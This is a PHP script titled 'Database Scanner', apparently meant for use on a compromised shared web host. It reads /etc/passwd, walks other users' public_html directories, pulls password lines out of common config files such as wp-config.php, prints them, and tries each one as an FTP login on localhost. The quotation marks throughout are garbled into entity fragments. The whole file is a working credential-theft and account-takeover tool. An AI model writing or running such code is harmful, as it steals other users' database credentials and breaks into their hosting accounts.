<?php
echo ***8220;<html>***8221;;
echo ***8220;<title>[ Database Scanner]</title><body>***8221;;
set_time_limit(0);
##################
@$passwd=fopen(***8216;/etc/passwd***8217;,'r***8217;);
if (!$passwd) {
echo ***8220;[-] Error : Can***8217;t read /etc/passwd***8221;;
exit;
}
$path_to_public=array();
$users=array();
$pathtoconf=array();
$i=0;
while(!feof($passwd)) {
$str=fgets($passwd);
if ($i>35) {
$pos=strpos($str,***8221;:***8221;);
$username=substr($str,0,$pos);
$dirz=***8221;/home/$username/public_html/***8221;;
if (($username!=***8221;")) {
if (is_readable($dirz)) {
array_push($users,$username);
array_push($path_to_public,$dirz);
}
}
}
$i++;
}
###################
#########################
echo ***8220;<br><br>***8221;;
echo ***8220;<textarea name=***8217;main_window***8217; cols=100 rows=20>***8221;;
echo ***8220;[+] Founded ***8220;.sizeof($users).***8221; entrys in /etc/passwd\n***8221;;
echo ***8220;[+] Founded ***8220;.sizeof($path_to_public).***8221; readable public_html directories\n***8221;;
echo ***8220;[~] Searching for passwords in config.* files***8230;\n\n***8221;;
foreach ($users as $user) {
$path=***8221;/home/$user/public_html/***8221;;
read_dir($path,$user);
}
echo ***8220;\n[+] Done\n***8221;;
function read_dir($path,$username) {
if ($handle = opendir($path)) {
while (false !== ($file = readdir($handle))) {
$fpath=***8221;$path$file***8221;;
if (($file!=***8217;.') and ($file!=***8217;..***8217;)) {
if (is_readable($fpath)) {
$dr=***8221;$fpath/***8221;;
if (is_dir($dr)) {
read_dir($dr,$username);
}
else {
if (($file==***8217;config.php***8217;) or ($file==***8217;header.inc.php***8217;) or ($file==***8217;content.inc.php***8217;) or ($file==***8217;mainfile.php***8217;) or ($file==***8217;utils.inc.php***8217;) or ($file==***8217;main.php***8217;) or ($file==***8217;config.inc.php***8217;) or ($file==***8217;db.inc.php***8217;) or ($file==***8217;connect.php***8217;) or ($file==***8217;wp-config.php***8217;) or ($file==***8217;var.php***8217;) or ($file==***8217;configure.php***8217;) or ($file==***8217;configuration.php***8217;) or ($file==***8217;configurations.php***8217;) or ($file==***8217;configs.php***8217;) or ($file==***8217;config.locale.php***8217;) or ($file==***8217;db.inc.php***8217;) or ($file==***8217;dbconnect.inc.php***8217;) or ($file==***8217;dbconnection.php***8217;) or ($file==***8217;var.php***8217;) or ($file==***8217;mysql.php***8217;) or ($file==***8217;global.inc.php***8217;) or ($file==***8217;database.php***8217;) or ($file==***8217;dbconnect.php***8217;) or ($file==***8217;conf.php***8217;) or ($file==***8217;configDB.inc.php***8217;) or ($file==***8217;db.php***8217;) or ($file==***8217;db_connect.php***8217;)) {
$pass=get_pass($fpath);
if ($pass!=***8221;) {
echo ***8220;[+] $fpath\n$pass\n***8221;;
ftp_check($username,$pass);
}
}
}
}
}
}
}
}
function get_pass($link) {
@$config=fopen($link,***8217;r');
while(!feof($config)) {
$line=fgets($config);
if (strstr($line,***8217;pass***8217;) or strstr($line,***8217;password***8217;) or strstr($line,***8217;passwd***8217;)) {
if (strrpos($line,***8217;***8221;***8216;))
$pass=substr($line,(strpos($line,***8217;=')+3),(strrpos($line,***8217;***8221;* **8216;)-(strpos($line,***8217;=')+3)));
else
$pass=substr($line,(strpos($line,***8217;=')+3),(strrpos($line,***8221;***8216;* **8221;)-(strpos($line,***8217;=')+3)));
return $pass;
}
}
}
function ftp_check($login,$pass) {
@$ftp=ftp_connect(***8217;127.0.0.1***8242;);
if ($ftp) {
@$res=ftp_login($ftp,$login,$pass);
if ($res) {
echo ***8216;[FTP] ***8216;.$login.***8217;:***8217;.$pass.***8221; Success\n***8221;;
}
else ftp_quit($ftp);
}
}
echo ***8220;</textarea><br>***8221;;
echo ***8220;</body></html>***8221;;
?>
